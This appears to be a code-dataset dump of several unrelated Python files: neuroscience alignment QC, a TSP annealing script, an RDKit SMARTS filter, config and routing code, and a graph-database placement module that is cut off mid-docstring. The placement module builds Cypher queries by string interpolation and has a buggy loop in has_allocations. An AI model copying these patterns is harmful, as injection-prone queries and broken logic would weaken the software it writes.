\"\"\"\r\n Compute alignment_qc for a specified probe insertion and updates extended qc field in alyx.\r\n If alignment is resolved and upload flags set to True channels from resolved\r\n alignment will be updated to alyx and datasets sent to ibl-ftp-patcher to be uploaded to\r\n flatiron\r\n \"\"\"\r\n if self.sim_matrix is None:\r\n self.compute()\r\n\r\n # Case where the alignment has already been resolved\r\n if self.resolved:\r\n self.log.info(f\"Alignment for insertion {self.eid} already resolved, channels won't be\"\r\n f\" updated. To force update of channels use \"\r\n f\"resolve_manual method with force=True\")\r\n results = {'alignment_count': len(self.alignments)}\r\n if update:\r\n self.update_extended_qc(results)\r\n results.update({'alignment_resolved': True})\r\n\r\n # Case where no alignments have been made\r\n elif np.all(self.sim_matrix == 0) and self.sim_matrix.shape[0] == 1:\r\n # We don't update database\r\n results = {'alignment_resolved': False}\r\n\r\n # Case where only one alignment\r\n elif np.all(self.sim_matrix == 1) and self.sim_matrix.shape[0] == 1:\r\n results = {'alignment_count': len(self.alignments),\r\n 'alignment_stored': self.align_keys_sorted[0],\r\n 'alignment_resolved': False}\r\n if update:\r\n self.update_extended_qc(results)\r\n\r\n # Case where 2 or more alignments and alignments haven't been resolved\r\n else:\r\n results = self.compute_alignment_status()\r\n\r\n if update:\r\n self.update_extended_qc(results)\r\n\r\n if results['alignment_resolved'] and (upload_alyx or upload_flatiron):\r\n self.upload_channels(results['alignment_stored'], upload_alyx, upload_flatiron)\r\n\r\n return results\r\n\r\n def resolve_manual(self, align_key, update=True, upload_alyx=True, upload_flatiron=True,\r\n force=False):\r\n \"\"\"\r\n Method to manually resolve the alignment of a probe insertion with a given alignment\r\n regardless of the number of alignments or the alignment qc value. Channels from specified\r\n alignment will be uploaded to alyx and datasets sent to ibl-ftp-patcher to be uploaded to\r\n flatiron. If alignment already resolved will only upload if force flag set to True\r\n \"\"\"\r\n\r\n if self.sim_matrix is None:\r\n self.compute()\r\n assert align_key in self.align_keys_sorted, 'align key not recognised'\r\n\r\n if self.resolved == 1 and not force:\r\n self.log.info(f\"Alignment for insertion {self.eid} already resolved, channels won't be\"\r\n f\"updated. To overwrite stored channels with alignment {align_key} \"\r\n f\"set 'force=True'\")\r\n file_paths = []\r\n else:\r\n results = self.compute_alignment_status()\r\n results['alignment_resolved'] = True\r\n results['alignment_stored'] = align_key\r\n results['alignment_resolved_by'] = 'experimenter'\r\n\r\n if update:\r\n self.update_extended_qc(results)\r\n file_paths = []\r\n\r\n if upload_alyx or upload_flatiron:\r\n file_paths = self.upload_channels(align_key, upload_alyx, upload_flatiron)\r\n\r\n return file_paths\r\n\r\n def compute_similarity_matrix(self):\r\n \"\"\"\r\n Computes the similarity matrix between each alignment stored in the ephys aligned\r\n trajectory. Similarity matrix based on number of clusters that share brain region and\r\n parent brain region\r\n \"\"\"\r\n\r\n r = BrainRegions()\r\n\r\n clusters = dict()\r\n for iK, key in enumerate(self.align_keys_sorted):\r\n # Location of reference lines used for alignment\r\n feature = np.array(self.alignments[key][0])\r\n track = np.array(self.alignments[key][1])\r\n\r\n # Instantiate EphysAlignment object\r\n ephysalign = EphysAlignment(self.xyz_picks, self.depths, track_prev=track,\r\n feature_prev=feature,\r\n brain_atlas=self.brain_atlas)\r\n\r\n # Find xyz location of all channels\r\n xyz_channels = ephysalign.get_channel_locations(feature, track)\r\n brain_regions = ephysalign.get_brain_locations(xyz_channels)\r\n\r\n # Find the location of clusters along the alignment\r\n cluster_info = dict()\r\n cluster_info['brain_id'] = brain_regions['id'][self.cluster_chns]\r\n cluster_info['parent_id'] = r.get(ids=cluster_info['brain_id']).parent.astype(int)\r\n clusters.update({key: cluster_info})\r\n\r\n sim_matrix = np.zeros((len(self.align_keys_sorted), len(self.align_keys_sorted)))\r\n\r\n for ik, key in enumerate(self.align_keys_sorted):\r\n for ikk, key2 in enumerate(self.align_keys_sorted):\r\n same_id = np.where(clusters[key]['brain_id'] == clusters[key2]['brain_id'])[0]\r\n not_same_id = \\\r\n np.where(clusters[key]['brain_id'] != clusters[key2]['brain_id'])[0]\r\n same_parent = np.where(clusters[key]['parent_id'][not_same_id] ==\r\n clusters[key2]['parent_id'][not_same_id])[0]\r\n sim_matrix[ik, ikk] = len(same_id) + (len(same_parent) * 0.5)\r\n # Normalise\r\n sim_matrix_norm = sim_matrix / np.max(sim_matrix)\r\n\r\n return sim_matrix_norm\r\n\r\n def compute_alignment_status(self):\r\n \"\"\"\r\n Determine whether alignments agree based on value in similarity matrix. If any alignments\r\n have similarity of 0.8 set the alignment to be resolved\r\n \"\"\"\r\n # Set diagonals to zero so we don't use those to find max\r\n np.fill_diagonal(self.sim_matrix, 0)\r\n # self.sim_matrix[self.sim_matrix == 1] = 0\r\n max_sim = np.max(self.sim_matrix)\r\n\r\n results = {'alignment_qc': max_sim,\r\n 'alignment_count': self.sim_matrix.shape[0]}\r\n\r\n if max_sim > CRITERIA['PASS']:\r\n location = np.where(self.sim_matrix == max_sim)\r\n results.update({'alignment_stored': self.align_keys_sorted[np.min(location)]})\r\n results.update({'alignment_resolved': True})\r\n results.update({'alignment_resolved_by': 'qc'})\r\n\r\n # outcome = 'PASS'\r\n\r\n else:\r\n results.update({'alignment_stored': self.align_keys_sorted[0]})\r\n results.update({'alignment_resolved': False})\r\n\r\n # outcome = 'WARNING'\r\n\r\n return results\r\n\r\n def upload_channels(self, alignment_key, upload_alyx, upload_flatiron):\r\n \"\"\"\r\n Upload channels to alyx and flatiron based on the alignment specified by the alignment key\r\n \"\"\"\r\n\r\n feature = np.array(self.alignments[alignment_key][0])\r\n track = np.array(self.alignments[alignment_key][1])\r\n ephysalign = EphysAlignment(self.xyz_picks, self.depths,\r\n track_prev=track,\r\n feature_prev=feature,\r\n brain_atlas=self.brain_atlas)\r\n\r\n # Find the channels\r\n channels_mlapdv = np.int32(ephysalign.get_channel_locations(feature, track) * 1e6)\r\n channels_brainID = ephysalign.get_brain_locations(channels_mlapdv / 1e6)['id']\r\n\r\n # Find the clusters\r\n r = BrainRegions()\r\n clusters_mlapdv = channels_mlapdv[self.cluster_chns]\r\n clusters_brainID = channels_brainID[self.cluster_chns]\r\n clusters_brainAcro = r.get(ids=clusters_brainID).acronym\r\n\r\n # upload datasets to flatiron\r\n files_to_register = []\r\n if upload_flatiron:\r\n ftp_patcher = FTPPatcher(one=self.one)\r\n insertion = self.one.alyx.rest('insertions', 'read', id=self.eid)\r\n alf_path = self.one.path_from_eid(insertion['session']).joinpath('alf',\r\n insertion['name'])\r\n alf_path.mkdir(exist_ok=True, parents=True)\r\n\r\n # Make the channels.mlapdv dataset\r\n f_name = alf_path.joinpath('channels.mlapdv.npy')\r\n np.save(f_name, channels_mlapdv)\r\n files_to_register.append(f_name)\r\n\r\n # Make the channels.brainLocationIds dataset\r\n f_name = alf_path.joinpath('channels.brainLocationIds_ccf_2017.npy')\r\n np.save(f_name, channels_brainID)\r\n files_to_register.append(f_name)\r\n\r\n # Make the clusters.mlapdv dataset\r\n f_name = alf_path.joinpath('clusters.mlapdv.npy')\r\n np.save(f_name, clusters_mlapdv)\r\n files_to_register.append(f_name)\r\n\r\n # Make the clusters.brainLocationIds dataset\r\n f_name = alf_path.joinpath('clusters.brainLocationIds_ccf_2017.npy')\r\n np.save(f_name, clusters_brainID)\r\n files_to_register.append(f_name)\r\n\r\n # Make the clusters.brainLocationAcronym dataset\r\n f_name = alf_path.joinpath('clusters.brainLocationAcronyms_ccf_2017.npy')\r\n np.save(f_name, clusters_brainAcro)\r\n files_to_register.append(f_name)\r\n\r\n self.log.info(\"Writing datasets to FlatIron\")\r\n ftp_patcher.create_dataset(path=files_to_register, created_by=self.one._par.ALYX_LOGIN)\r\n\r\n # Need to change channels stored on alyx as well as the stored key is not the same as the\r\n # latest key\r\n if upload_alyx:\r\n if alignment_key != self.align_keys_sorted[0]:\r\n histology.register_aligned_track(self.eid, channels_mlapdv / 1e6,\r\n chn_coords=SITES_COORDINATES, one=self.one,\r\n overwrite=True, channels=self.channels)\r\n\r\n ephys_traj = self.one.alyx.rest('trajectories', 'list', probe_insertion=self.eid,\r\n provenance='Ephys aligned histology track')\r\n patch_dict = {'json': self.alignments}\r\n self.one.alyx.rest('trajectories', 'partial_update', id=ephys_traj[0]['id'],\r\n data=patch_dict)\r\n\r\n return files_to_register\r\n\r\n def update_experimenter_evaluation(self, prev_alignments=None, override=False):\r\n\r\n if not np.any(prev_alignments) and not np.any(self.alignments):\r\n aligned_traj = self.one.alyx.rest('trajectories', 'list', probe_insertion=self.eid,\r\n provenance='Ephys aligned histology track')\r\n if len(aligned_traj) > 0:\r\n self.alignments = aligned_traj[0].get('json', {})\r\n else:\r\n self.alignments = {}\r\n return\r\n else:\r\n self.alignments = prev_alignments\r\n\r\n outcomes = [align[2].split(':')[0] for key, align in self.alignments.items()\r\n if len(align) == 3]\r\n if len(outcomes) > 0:\r\n vals = [CRITERIA_BASE[out] for out in outcomes]\r\n max_qc = np.argmax(vals)\r\n outcome = outcomes[max_qc]\r\n self.update(outcome, namespace='experimenter', override=override)\r\n else:\r\n self.log.warning(f'No experimenter qc found, qc field of probe insertion {self.eid} '\r\n f'will not be updated')\r\n","sub_path":"ibllib/qc/alignment_qc.py","file_name":"alignment_qc.py","file_ext":"py","file_size_in_byte":15629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"105004364","text":"\"\"\"\n=================== TASK 2 ====================\n* Name: Product Of Digits\n*\n* Write a script that will take an input from user\n* as integer number and display product of digits\n* for a given number. Consider that user will always\n* provide integer number.\n*\n* Note: Please describe in details possible cases\n* in which your solution might not work.\n===================================================\n\"\"\"\n\ndef pro_digits(number):\n\n # Chek if passed number is integer\n if not isinstance(number, int):\n return -1\n\n\n digit_pro = 1\n\n\n\n\n while number > 1:\n digit = number % 10\n number = number // 10\n digit_pro *= digit\n\n return digit_pro\n\n\ndef main():\n\n int_number = 1234\n digit_pro = pro_digits(int_number)\n print(\"Pro of digits for given numbers is: \", digit_pro)\n\nmain()\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"248230404","text":"from z3 import *\n\nA_version = [0, 0, 0, 0, 0]\nA = [1, -1, -1, -1, -1]\npath_cond = []\nsym_store = {}\n\ndef getSymVariable(var, idx, version):\n\n var_name = str(var) +\"_\"+ str(idx)+\"_v\" + str(version)\n\n if(var_name not in sym_store.keys()):\n sym_store[var_name] = Int(var_name)\n\n return sym_store[var_name]\n\n\ndef ssa(A):\n\n for i in range(0, len(A)-1):\n if(A[i]>0):\n path_cond.append(getSymVariable(\"A\", i, A_version[i])>0)\n A[i+1] = -1*A[i+1]\n path_cond.append(getSymVariable(\"A\", i+1, A_version[i+1]+1) == -1*getSymVariable(\"A\", i+1, A_version[i+1]))\n A_version[i+1]+=1\n\n\n\n else:\n break\n\n\n\nssa(A)\n\nfor i in range(0, len(path_cond)):\n print(path_cond[i])\n\n\n\nsolve(path_cond)\n\n","sub_path":"Spring2018/Charitha-Xstressor/benchmarks/ssa_example/tests/ssa_exp.py","file_name":"ssa_exp.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"633458264","text":"from oslo_config import cfg\n\n\nCONF = cfg.CONF\nkubernetes_opts = [\n cfg.StrOpt('server',\n default='127.0.0.1:8080',\n help='Addres and port for kube-apiserver'),\n cfg.StrOpt('namespace',\n default='ccp',\n help='The name of the namespace'),\n cfg.StrOpt('ca-certs',\n help='The location of the CA certificate files'),\n cfg.StrOpt('key-file',\n help='The location of the key file'),\n cfg.StrOpt('cert-file',\n help='The location of the certificate file')\n]\nkubernetes_opt_group = cfg.OptGroup(name='kubernetes',\n title='Kubernetes client')\nCONF.register_group(kubernetes_opt_group)\nCONF.register_cli_opts(kubernetes_opts, kubernetes_opt_group)\nCONF.register_cli_opts(kubernetes_opts, kubernetes_opt_group)\n\nSCHEMA = {\n 'kubernetes': {\n 'type': 'object',\n 'additionalProperties': False,\n 'properties': {\n 'server': {'type': 'string'},\n 'namespace': {'type': 'string'},\n 'ca_certs': {'anyOf': [{'type': 'string'}, {'type': 'null'}]},\n 'key_file': {'anyOf': [{'type': 'string'}, {'type': 'null'}]},\n 'cert_file': {'anyOf': [{'type': 'string'}, {'type': 'null'}]},\n },\n },\n}\n","sub_path":"fuel_ccp/config/kubernetes.py","file_name":"kubernetes.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"556230813","text":"from rita.misc.facade import Facade\r\n\r\nurls = [\r\n # equal type\r\n {\r\n \"/login\":\"login\"\r\n , \"/logout\":\"logout\"\r\n , \"/articles/search\":\"articles.search\"\r\n , \"/sitemap.xml\":\"sitemap\"\r\n , \"/admin/articles/preview\":\"articles.preview\"\r\n }\r\n \r\n # startswith type\r\n , [\r\n (\"/admin/articles\", \"articles\")\r\n , (\"/admin/templates\", \"templates\")\r\n , (\"/admin/sitevariables\", \"sitevariables\")\r\n , (\"/\", \"index\")\r\n ]\r\n]\r\n\r\nclass MyFacade(Facade):\r\n def __init__(self, debug=True):\r\n self.debug = debug\r\n \r\n def get_handler_class(self, env, routes):\r\n \"\"\"return handler clas from path_info\"\"\"\r\n path_info = env[\"PATH_INFO\"]\r\n\r\n # search handler equals pathinfo\r\n equal_handlers = urls[0]\r\n if path_info in equal_handlers:\r\n return self.get_class(equal_handlers[path_info])\r\n \r\n # search handler startswith pathinfo\r\n startswith_handlers = urls[1]\r\n for route in startswith_handlers:\r\n key, handler_path = route\r\n if path_info.startswith(key):\r\n if path_info.endswith(\"/edit\"):\r\n handler_path += \".edit\"\r\n return self.get_class(handler_path)\r\n\r\n def get_class(self, full_path):\r\n if not full_path.startswith(\"controller.\"):\r\n full_path = \"controller.\" + full_path\r\n \r\n if not full_path.endswith(\".index.Main\"):\r\n full_path += \".index.Main\"\r\n \r\n splited_path = full_path.split('.')\r\n module_path, klass = '.'.join(splited_path[:-1]), splited_path[-1]\r\n module = __import__(module_path, globals(), locals(), [\"\"])\r\n return getattr(module, klass)\r\n \r\n def handle500(self, exception, start_response):\r\n if self.debug == True:\r\n return super().handle500(exception, start_response)\r\n else:\r\n status = \"500 Internal Server Error\"\r\n response_headers = [('Content-Type', 'text/html;charset=utf-8')]\r\n start_response(status, response_headers)\r\n return [\"500 Internal Server Error\" + \" \"*512]\r\n","sub_path":"route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"601731459","text":"from matplotlib import pyplot as plt\nimport numpy as np\n\n# 产生坐标字典\ndef coordinate_init(size):\n coordinate_dict = {}\n coordinate_dict[0] = (0, 0) # 起点是(0,0)\n for i in range(1, size + 1): # 顺序标号随机坐标\n coordinate_dict[i] = (np.random.uniform(0, size), np.random.uniform(0, size)) # 均匀分布的随机数\n coordinate_dict[size + 1] = (0, 0) # 终点是(0,0)\n return coordinate_dict\n\n# 生成距离矩阵\ndef distance_matrix(coordinate_dict, size):\n d = np.zeros((size + 2, size + 2)) # 生成零矩阵\n for i in range(size + 1):\n for j in range(size + 1):\n if (i == j):\n continue\n if (d[i][j] != 0):\n continue # 算过的不再重复计算\n x1 = coordinate_dict[i][0]\n y1 = coordinate_dict[i][1]\n x2 = coordinate_dict[j][0]\n y2 = coordinate_dict[j][1]\n distance = np.sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2) # 按照顺序求距离矩阵\n if (i == 0):\n d[i][j] = d[size + 1][j] = d[j][i] = d[j][size + 1] = distance # 消除误差保证矩阵的对称\n else:\n d[i][j] = d[j][i] = distance\n return d\n\n# 计算路径长度\ndef path_length(d_matrix, path_list, size):\n length = 0\n for i in range(size + 1):\n length += d_matrix[path_list[i]][path_list[i + 1]]\n return length\n\n# 二交换法生成新路径\ndef new_path(path_list, size):\n change_head = np.random.randint(1, size + 1)\n change_tail = np.random.randint(1, size + 1)\n if (change_head > change_tail):\n change_head, change_tail = change_tail, change_head # 确定一对路径头尾\n change_list = path_list[change_head:change_tail + 1]\n change_list.reverse() # change_head与change_tail之间的路径反序\n new_path_list = path_list[:change_head] + change_list + path_list[change_tail + 1:]\n return change_head, change_tail, new_path_list\n\n# 计算新旧路径的长度之差\ndef diff_old_new(d_matrix, path_list, new_path_list, head, tail):\n old_length = d_matrix[path_list[head - 1]][path_list[head]] + d_matrix[path_list[tail]][path_list[tail + 1]]\n new_length = d_matrix[new_path_list[head - 1]][new_path_list[head]] + d_matrix[new_path_list[tail]][\n new_path_list[tail + 1]]\n delta_p = new_length - old_length # 被反转的路径内部距离不变\n return delta_p\n\n\nT_start = 2000 # 起始温度\nT_end = 1e-20 # 结束温度\na = 0.995 # 降温速率\nLk = 50 # 内循环次数,马尔科夫链长\nsize = 20\ncoordinate_dict = coordinate_init(size)\nprint(coordinate_dict) # 打印坐标字典\npath_list = list(range(size + 2)) # 初始化路径\nd = distance_matrix(coordinate_dict, size) # 距离矩阵的生成\nbest_path = path_length(d, path_list, size) # 初始化最好路径长度\nprint('初始路径:', path_list)\nprint('初始路径长度:', best_path)\nbest_path_temp = [] # 记录每个温度下最好路径长度\nbest_path_list = [] # 用于记录历史上最好路径\nbalanced_path_list = path_list # 记录每个温度下的平衡路径\nbalenced_path_temp = [] # 记录每个温度下平衡路径(局部最优)的长度\nwhile T_start > T_end:\n for i in range(Lk):\n head, tail, new_path_list = new_path(path_list, size)\n delta_p = diff_old_new(d, path_list, new_path_list, head, tail)\n if delta_p < 0: # 接受状态\n balanced_path_list = path_list = new_path_list\n new_len = path_length(d, path_list, size)\n if (new_len < best_path):\n best_path = new_len\n best_path_list = path_list\n elif np.random.random() < np.exp(-delta_p / T_start): # 以概率接受状态\n path_list = new_path_list\n path_list = balanced_path_list # 继承该温度下的平衡状态(局部最优)\n T_start *= a # 退火\n best_path_temp.append(best_path)\n balenced_path_temp.append(path_length(d, balanced_path_list, size))\nprint('结束温度的局部最优路径:', balanced_path_list)\nprint('结束温度的局部最优路径长度:', path_length(d, balanced_path_list, size))\nprint('最好路径:', best_path_list)\nprint('最好路径长度:', best_path)\nx = []\ny = []\nfor point in best_path_list:\n x.append(coordinate_dict[point][0])\n y.append(coordinate_dict[point][1])\nplt.figure(1)\nplt.subplot(311)\nplt.plot(balenced_path_temp) # 每个温度下平衡路径长度\nplt.subplot(312)\nplt.plot(best_path_temp) # 每个温度下最好路径长度\nplt.subplot(313)\nplt.scatter(x, y)\nplt.plot(x, y) # 路径图\nplt.grid()\nplt.show()","sub_path":"TSP-SA.py","file_name":"TSP-SA.py","file_ext":"py","file_size_in_byte":4631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"570406474","text":"import sys\nfrom rdkit import Chem\nfrom rdkit.Chem import SaltRemover\n\n\nclass SMARTmatcher:\n\n # Constructor of class#####################################\n def __init__(self, infile, smartfile, outfile, processtrue):\n\n self._infile = infile\n self._smartfile = smartfile\n self._outfile = outfile\n self._smartPatterns = {}\n self._noofmolsread = 0\n self._noofmolswritten = 0\n self._process = processtrue\n\n # pass the smartpattern file###############################\n def parse_smart_queries(self, smartfile):\n\n datareader = open(smartfile, \"r\")\n smartsMol_Tag = {}\n\n for line in datareader.readlines():\n line = line.strip()\n splitline = line.split(\" \")\n try:\n mol = Chem.MolFromSmarts(splitline[0])\n if mol is None:\n print(splitline[1])\n continue\n else:\n smartsMol_Tag[splitline[1]] = mol\n except:\n continue\n return smartsMol_Tag\n\n # parse the smiles########################################\n def parseSmiles(self, smiles):\n\n try:\n mol = Chem.MolFromSmiles(smiles)\n mol = Chem.RemoveHs(mol)\n Remover = SaltRemover.SaltRemover()\n mol = Remover.StripMol(mol)\n Chem.SanitizeMol(mol)\n Chem.SetHybridization(mol)\n Chem.SetAromaticity(mol)\n return mol\n except:\n return None\n\n # matched the smart########################################\n def match_smart_queries(self, smartsQueries, mol):\n\n try:\n result = {}\n for qtag in smartsQueries:\n qsmartMol = smartsQueries[qtag]\n all_matches = mol.GetSubstructMatches(qsmartMol)\n result[qtag] = len(all_matches)\n return result\n except:\n None\n\n ##########################################################\n def getDictKeysAsString(self, d, delim):\n out = \"\"\n for key in d:\n out = out + key + delim\n return out[:-1]\n\n ##########################################################\n def getDictValsAsString(self, d, delim):\n out = \"\"\n for key in d:\n out = out + str(d[key]) + delim\n return out[:-1]\n\n ##########################################################\n def getDictKeyValsAsString(self, d, delim1, delim2):\n out = \"\"\n for key in d:\n out = out + (str(key) + delim1 + str(d[key])) + delim2\n return out[:-1]\n\n ##########################################################\n def updateLastLog(self):\n\n print(\"=========Below smart queries were used==========\")\n for key in self._smartPatterns:\n print(key)\n print(\"=================================================\")\n\n ##########################################################\n def parseLineAndGetMol(self, line, process):\n\n linesplit = line.split(\" \")\n try:\n mol = Chem.MolFromSmiles(linesplit[0])\n if process == 1:\n mol = self.parseSmiles(linesplit[0])\n return mol\n except:\n return None\n\n ##########################################################\n def formatOutput(self, line, smartres, outputstyle):\n\n try:\n if outputstyle == 1:\n output = self.getDictKeyValsAsString(smartres, \":\", \" \")\n output = line + \" \" + output\n return output\n else:\n output = self.getDictValsAsString(smartres, \";\")\n output = line + \" \" + output\n return output\n except:\n return \"None\"\n\n # Run it##################################################\n def runIt(self):\n\n try:\n self._smartPatterns = self.parse_smart_queries(self._smartfile)\n except:\n print(\"Problem in reading smarts query file.\")\n print(\"Exiting for now.\")\n exit()\n\n if len(self._smartPatterns) == 0:\n print(\"No smart queries provided\")\n print(\"Exiting for now.\")\n exit()\n\n try:\n datareader = open(self._infile, \"r\")\n datawriter = open(self._outfile, \"w\")\n outdata = {}\n while True:\n\n line = datareader.readline()\n if line is \"\":\n break\n\n line = line.strip()\n linesplit = line.split(\" \")\n smi = linesplit[0]\n tag = \"noname\"\n if len(linesplit) > 1:\n tag = linesplit[1]\n\n mol = self.parseLineAndGetMol(smi, self._process)\n\n if mol is None:\n continue\n\n if mol.GetNumAtoms() < 4:\n continue\n\n res = self.match_smart_queries(self._smartPatterns, mol)\n smi = Chem.MolToSmiles(mol)\n\n if res is None:\n continue\n\n failed = False\n for key in res:\n if res[key] > 0:\n failed = True\n\n if failed:\n continue\n\n outdata[line] = smi+\" \"+tag\n datareader.close()\n\n totalcpdspass = len(outdata)\n for key in outdata:\n datawriter.write(outdata[key]+\"_\"+str(totalcpdspass)+\"\\n\")\n datawriter.close()\n print(\"END\")\n\n except Exception as er:\n print(er)\n print(\"Problem in reading/writing database file.\")\n print(\"Exiting for now.\")\n exit()\n\n\nsm = SMARTmatcher(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])\nsm.runIt()\n","sub_path":"removeCpdsBasedOnSmartsQ.py","file_name":"removeCpdsBasedOnSmartsQ.py","file_ext":"py","file_size_in_byte":5849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"469445237","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport collections\nimport copy\n\n# NOTE(cdent): The resource provider objects are designed to never be\n# used over RPC. Remote manipulation is done with the placement HTTP\n# API. The 'remotable' decorators should not be used, the objects should\n# not be registered and there is no need to express VERSIONs nor handle\n# obj_make_compatible.\n\nfrom oslo_db import api as oslo_db_api\nfrom oslo_db import exception as db_exc\nfrom oslo_log import log as logging\nfrom oslo_utils import excutils\nimport six\n\nfrom placement.db import graph_db as db\nfrom placement import db_api\nfrom placement import exception\nfrom placement.objects import inventory as inv_obj\nfrom placement.objects import research_context as res_ctx\nfrom placement.objects import trait as trait_obj\nfrom placement import resource_class_cache as rc_cache\nfrom placement import util\n\n\nLOG = logging.getLogger(__name__)\n\n\n@db_api.placement_context_manager.writer\ndef get_current_inventory_resources(ctx, rp, include_total=False):\n \"\"\"Returns a set() containing the names of the resource classes for all\n resources currently having an inventory record for the supplied resource\n provider. If 'include_total' is True, the set will contain (rc_name, total)\n tuples instead of just the rc_name.\n\n :param ctx: `placement.context.RequestContext` that may be used to grab a\n DB connection.\n :param rp: Resource provider to query inventory for.\n :param include_total: Determines if we return (rc_name, total) tuples\n (True), or just the rc_names.\n \"\"\"\n rp_uuid = rp if isinstance(rp, six.string_types) else rp.uuid\n query = \"\"\"\n MATCH (rp {uuid: '%s'})-[:PROVIDES]->(rc)\n RETURN labels(rc)[0] AS rc_name, rc.total as rc_total\n \"\"\" % rp_uuid\n result = ctx.tx.run(query).data()\n if include_total:\n resources = [(rec[\"rc_name\"], rec[\"rc_total\"]) for rec in result]\n else:\n resources = [rec[\"rc_name\"] for rec in result]\n return set(resources)\n\n\ndef has_allocations(ctx, rp, rcs=None):\n \"\"\"Returns True if there are any allocations against resources from the\n specified provider. If `rcs` is specified, the check is limited to\n allocations against just the resource classes specified.\n \"\"\"\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})-->(inv)<-[:USES]-(cs)\n RETURN labels(inv)[0] AS rc\n \"\"\" % rp.uuid\n result = ctx.tx.run(query).data()\n if not result:\n return False\n if rcs:\n allocs = [rec[\"rc\"] for rec in result]\n for rc in rc:\n if rc in allocs:\n return True\n return False\n return True\n\n\n@db_api.placement_context_manager.reader\ndef get_allocated_inventory(ctx, rp, rcs=None):\n \"\"\"Returns the list of resource classes for any inventory that has\n allocations against it, along with the total amount allocated. If `rcs` is\n specified, the returned list is limited to only those resource classes in\n `rcs` that have allocations.\n \"\"\"\n rp_uuid = rp if isinstance(rp, six.string_types) else rp.uuid\n query = \"\"\"\n MATCH p=(rp:RESOURCE_PROVIDER {uuid: '%s'})-->(inv)<-[:USES]-(cs)\n WITH last(relationships(p)) AS usages, labels(inv)[0] AS rcname\n RETURN rcname, sum(usages.amount) AS used\n \"\"\" % rp_uuid\n result = ctx.tx.run(query).data()\n if not result:\n return {}\n allocs = {rec[\"rcname\"]: rec[\"used\"] for rec in result}\n if rcs:\n rcs = set(rcs)\n alloc_keys = set(allocs.keys())\n for alloc_key in alloc_keys - rcs:\n allocs.pop(alloc_key)\n return allocs\n\n\ndef _delete_inventory_from_provider(ctx, rp, to_delete=None):\n \"\"\"Deletes any inventory records from the supplied provider and set() of\n resource class identifiers.\n\n If there are allocations for any of the inventories to be deleted raise\n InventoryInUse exception.\n\n :param ctx: `placement.context.RequestContext` that contains an oslo_db\n Session\n :param rp: Resource provider from which to delete inventory.\n :param to_delete: set() containing resource class names to delete. If\n to_delete is None, all inventory will be deleted.\n \"\"\"\n rp_uuid = rp if isinstance(rp, six.string_types) else rp.uuid\n allocs = get_allocated_inventory(ctx, rp_uuid, rcs=to_delete)\n if allocs:\n alloc_keys = \", \".join(allocs.keys())\n raise exception.InventoryInUse(resource_classes=alloc_keys,\n resource_provider=rp_uuid)\n if to_delete is None:\n to_delete = get_current_inventory_resources(ctx, rp_uuid)\n for rc in to_delete:\n # Delete the providing relationship first\n query = \"\"\"\n MATCH p=(rp {uuid: '%s'})-[:PROVIDES]->(rc:%s)\n WITH relationships(p)[0] AS rel, rc\n DELETE rel\n RETURN id(rc) AS rcid\n \"\"\" % (rp_uuid, rc)\n result = ctx.tx.run(query).data()\n if not result:\n return 0\n else: \n rcid = result[0][\"rcid\"]\n # Now delete the inventory\n query = \"\"\"\n MATCH (inv)\n WHERE id(inv) = %s\n WITH inv\n DELETE inv\n \"\"\" % rcid\n result = ctx.tx.run(query)\n return len(to_delete)\n\n\ndef _add_inventory_to_provider(ctx, rp, inv_list):\n \"\"\"Inserts new inventory records for the supplied resource provider.\n\n :param ctx: `placement.context.RequestContext` that contains an oslo_db\n Session\n :param rp: Resource provider to add inventory to.\n :param inv_list: List of Inventory objects\n \"\"\"\n # First ensure that the RP doesn't contain any inventory for the resources\n # classes to be added.\n rc_to_add = [inv.resource_class for inv in inv_list]\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})-[:PROVIDES]->(rc)\n WHERE labels(rc)[0] IN %s\n RETURN labels(rc)[0] AS rc_name\n \"\"\" % (rp.uuid, rc_to_add)\n result = ctx.tx.run(query).data()\n if result:\n raise db_exc.DBDuplicateEntry()\n inv_adds = []\n for inv_rec in inv_list:\n rc_name = inv_rec.resource_class\n rc_atts = [\"allocation_ratio: %s\" % inv_rec.allocation_ratio,\n \"total: %s\" % inv_rec.total,\n \"max_unit: %s\" % inv_rec.max_unit,\n \"min_unit: %s\" % inv_rec.min_unit,\n \"reserved: %s\" % inv_rec.reserved,\n \"step_size: %s\" % inv_rec.step_size,\n ]\n rc_att_str = \", \".join(rc_atts)\n inv_adds.append(\"CREATE (rp)-[:PROVIDES]->(:%s {%s})\" %\n (rc_name, rc_att_str))\n creates = \"\\n\".join(inv_adds)\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})\n WITH rp\n %s\n \"\"\" % (rp.uuid, creates)\n result = ctx.tx.run(query).data()\n\ndef _update_inventory_for_provider(ctx, rp, inv_list, to_update):\n \"\"\"Updates existing inventory records for the supplied resource provider.\n\n :param ctx: `placement.context.RequestContext` that contains an oslo_db\n Session\n :param rp: Resource provider on which to update inventory.\n :param inv_list: List of Inventory objects\n :param to_update: set() 